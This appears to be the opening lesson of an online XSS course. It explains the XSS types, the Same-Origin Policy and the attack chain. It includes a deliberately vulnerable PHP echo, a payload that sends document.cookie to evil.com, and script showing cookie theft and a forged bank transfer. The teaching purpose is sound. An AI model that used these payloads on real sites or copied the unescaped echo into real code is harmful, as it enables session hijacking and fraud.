Cross-Site Scripting (XSS) remains one of the most prevalent and dangerous web application vulnerabilities in the modern threat landscape. Despite being well-understood for over two decades, XSS consistently appears in the OWASP Top 10 and accounts for roughly 40% of all reported web vulnerabilities. In this course, you will journey from foundational concepts through advanced exploitation techniques and robust defense strategies.
This first lesson establishes the conceptual bedrock for everything that follows. You will learn what XSS is, why it exists, how it is classified, and the browser security mechanisms that both enable and constrain it. By the end, you will have a clear mental model of the XSS attack surface.
💡 This course is designed for intermediate learners. You should have a basic understanding of HTML, JavaScript, and HTTP before proceeding. All exercises are performed in authorized lab environments or CTF challenges — never against systems you do not have explicit permission to test.
Cross-Site Scripting is a client-side code injection attack where an attacker injects malicious scripts into web pages viewed by other users. The malicious script executes in the victim's browser within the context of the vulnerable application, giving the attacker access to session tokens, cookies, and the ability to modify page content or redirect users to malicious sites.
The term "cross-site" is historical — the original attack involved loading content from a different (cross) site. Modern XSS attacks do not necessarily involve cross-origin requests. The core issue is that the application trusts user-controlled input and renders it without proper sanitization or encoding.
<!-- Vulnerable PHP code example -->
<?php
$name = $_GET['name'];
echo "<h1>Welcome, " . $name . "</h1>";
?>
<!-- Attacker crafts this URL: -->
<!-- https://vulnerable-app.com/?name=<script>document.location='https://evil.com/steal?c='+document.cookie</script> -->
<!-- The victim's browser receives: -->
<h1>Welcome, <script>document.location='https://evil.com/steal?c='+document.cookie</script></h1>XSS vulnerabilities are classified into three primary categories based on how the malicious payload reaches the victim's browser. Understanding these categories is essential because each requires different detection and exploitation approaches.
| Type | How Payload Reaches Victim | Server Involves Storage? | Common Severity |
|---|---|---|---|
| Reflected XSS | Payload is in the URL or request; server reflects it in the response | No | Medium |
| Stored XSS | Payload is saved on the server (database, file) and served to victims | Yes | High |
| DOM-based XSS | Payload is processed entirely by client-side JavaScript | No (client-side only) | Medium to High |
The Same-Origin Policy (SOP) is a critical browser security mechanism that restricts how a document or script loaded from one origin can interact with resources from another origin. An origin is defined by the combination of protocol, hostname, and port. SOP prevents a malicious site from reading data from your banking site, for example.
XSS is so dangerous precisely because it bypasses the Same-Origin Policy entirely. When a script executes within the context of the vulnerable application's origin, the browser treats it as a legitimate script from that origin. It has full access to cookies, DOM elements, localStorage, and can make authenticated requests to the application's API endpoints.
// Because this script executes in the context of https://bank.com,
// the Same-Origin Policy grants it full access:
// Read session cookies (unless HttpOnly is set)
const sessionCookie = document.cookie;
// Access the entire DOM
const accountBalance = document.querySelector('#balance').textContent;
// Make authenticated API requests
fetch('/api/transfer', {
method: 'POST',
credentials: 'include',
body: JSON.stringify({ to: 'attacker', amount: 10000 })
});
// Access localStorage data
const authToken = localStorage.getItem('authToken');⚠️ The Same-Origin Policy is NOT a defense against XSS. It is a defense against cross-origin data theft. XSS executes within the vulnerable origin, so SOP provides zero protection. Never rely on SOP as a mitigation for XSS.
Every XSS attack follows a predictable kill chain. Understanding this chain helps you systematically identify, exploit, and defend against XSS vulnerabilities.
Throughout this course, we will follow this kill chain for each XSS type. Mastering each stage of the chain is what separates a script kiddie from a professional penetration tester.
Modern web frameworks like React, Angular, and Vue.js provide built-in XSS protection through automatic output encoding. Content Security Policy (HTTP headers) adds another layer of defense. So why is XSS still so prevalent?
💡 According to HackerOne's annual reports, XSS consistently ranks as the #1 most reported vulnerability type, accounting for approximately 25-30% of all valid bug bounty submissions. This makes XSS skills directly monetizable through responsible disclosure programs.
In the next lesson, we will dive deep into Reflected XSS — the most common entry point for XSS exploitation. You will learn how to identify reflection points, craft injection payloads, and understand the different contexts where reflection occurs. We will also set up your lab environment for hands-on practice.
Verify exercises to earn ★ 100 XP and unlock next lab level.